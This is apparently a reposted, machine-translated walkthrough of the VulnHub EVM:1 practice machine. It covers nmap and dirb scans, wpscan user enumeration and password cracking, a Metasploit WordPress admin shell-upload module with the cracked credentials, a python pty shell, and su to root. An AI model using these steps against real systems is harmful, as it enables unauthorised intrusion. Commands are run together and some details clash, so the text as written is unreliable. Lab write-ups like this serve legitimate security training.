Shulou(Shulou.com)06/01 Report--

one。 Environment building

Https://www.vulnhub.com/entry/evm-1,391/

Download ova image file, import vbox, and set up two virtual network cards, which are NAT mode and host-only mode (changed to default Nic configuration)

Ip is 192.168.124.156

two。 Information gathering:

(Port scan)

Nmap-A 192.168.124.56Starting Nmap 7.70 (https://nmap.org) at 2019-12-16 01:45 ESTNmap scan report for localhost (192.168.124.56) Host is up (0.00035s latency) .Not shown: 993 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux) Protocol 2.0) | ssh-hostkey: | 2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA) | 256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA) | _ 256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa ( ED25519) 53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: | _ bind.version: 9.10.3-P4-Ubuntu80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | _ http-server-header: Apache/2.4.18 (Ubuntu) | _ http-title: Apache2 Ubuntu Default Page: It works110/tcp open pop3?139/tcp open netbios-ssn Samba smbd 3.x-4.X (workgroup: WORKGROUP) 143 / tcp open imap Dovecot imapd | _ imap-capabilities: CAPABILITY445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) MAC Address: 00:0C:29:C4:5F:AA (VMware) Device type: general purposeRunning: Linux 3.x | 4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2-4.9Network Distance: 1 hopService Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE OS: Linux CPE: cpe:/o:linux:linux_kernelHost script results: | _ clock-skew: mean: 1h49m59s, deviation: 2h63m12s, median: 0s | _ nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: ubuntu-extermely-vulnerable-m4ch2ine | NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\ X00 | Domain name:\ X00 | FQDN: ubuntu-extermely-vulnerable-m4ch2ine | _ System time: 2019-12-16T01:48:21-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported | _ message_signing: disabled (dangerous (but default) | smb2-security-mode: | 2.02: | _ Message signing enabled but not required | smb2-time: | date: 2019-12-16 01:48:21 | _ start_date: Nacha

(catalog scan)

Start using dirb for directory scanning dirb http://192.168.124.56/

The catalog scan shows that he has wordpress, so try the previously used tool wpscan first.

Wpscan-- url http://192.168.124.56/wordpress/-e u

Successfully got the account number c0rrupt3d_brain, now continue to crack his password

Wpscan-- url http://192.168.124.56/wordpress/-e u-P / chen.txt

Successfully cracked the password 24992499

Now start using the msfconsole usage module

Unix/webapp/wp_admin_shell_uploadset RhOSTS 192.168.124.56set USERNAME c0rrupt3d_brainset PassWORD 24992499set targeturi / wordpressrun

After entering his home directory directly, cd root3r came in and found that a file seemed to be a root password file.

Now look at it and find that it seems to be a password. Now that you already know the password, go to the interactive page as shown below:

Shellpython-c "import pty;pty.spawn ('/ bin/bash')" su root

The password is entered as: willy26

Successfully got the root

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.